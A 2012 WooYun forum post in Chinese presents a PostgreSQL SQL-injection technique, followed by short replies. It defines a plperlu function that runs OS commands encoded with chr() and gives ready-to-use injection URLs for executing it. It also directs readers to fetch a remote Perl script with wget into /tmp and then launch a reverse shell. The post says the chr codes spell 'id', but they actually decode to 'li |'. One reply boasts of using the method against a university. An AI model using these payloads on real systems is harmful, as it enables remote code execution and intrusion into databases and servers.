当前位置:WooYun(白帽子技术社区) >> PostgreSQL >> postgresql "初级"注入大法

postgresql "初级"注入大法

s4msung ([email protected]) | 2012-11-12 19:29

CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;

select id();
id()为创建函数名,可以自定义随便写
chr(108).chr(105)是需要执行的命令id的asc编码
自己把需要执行的命令换成chr替换就行了,具体就是wget http://les.la/c.pl -O /tmp/c.pl  
删除函数为drop function id(); 然后再执行此反弹shell的命令

此大法可对付一切8.0以上的版本(含8.0)

以下为实际注入时的表现形式
xxx.php?id=10;CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),<FD>);$aaa$ LANGUAGE plperlu;--
xxx.php?id=10 and 1=2 union select null,null,null,id(),null,null,null,null--

ppp.jpg

分享到:
6 个回复
  1. 1#
    回复此人 感谢
    Xhm1n9 | 2012-11-12 21:09

    学习了

  2. 2#
    回复此人 感谢
    伟大娃娃 (٩[·̮̃·̃]۶٩[·̮̃·̃]۶) | 2012-11-13 00:37

    学习,求推荐好的PGSQL注入文章或工具.

  3. 3#
    回复此人 感谢
    xsser (十根阳具有长短!!) | 2012-11-13 09:25

    注意领域主页右边

  4. 4#
    回复此人 感谢
    saber (终极屌丝之路~) | 2012-11-13 09:32

    学习了 不过觉得第一种好坑人~

  5. 5#
    回复此人 感谢
    无敌L.t.H (‮……天百一爱恋考高:簿相色白产国) | 2012-11-13 10:31

    以前搞东京大学的时候研究过

  6. 6#
    回复此人 感谢
    teamtopkarl | 2012-12-11 07:49

    sqlmap就可以注入

添加新回复

登录 后才能参与评论.

WooYun(白帽子技术社区)

网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地

登录

其它内容

  • 暂无

Copyright © 2010 www.wooyun.org All Rights Reserved. 吉ICP备12001400号-1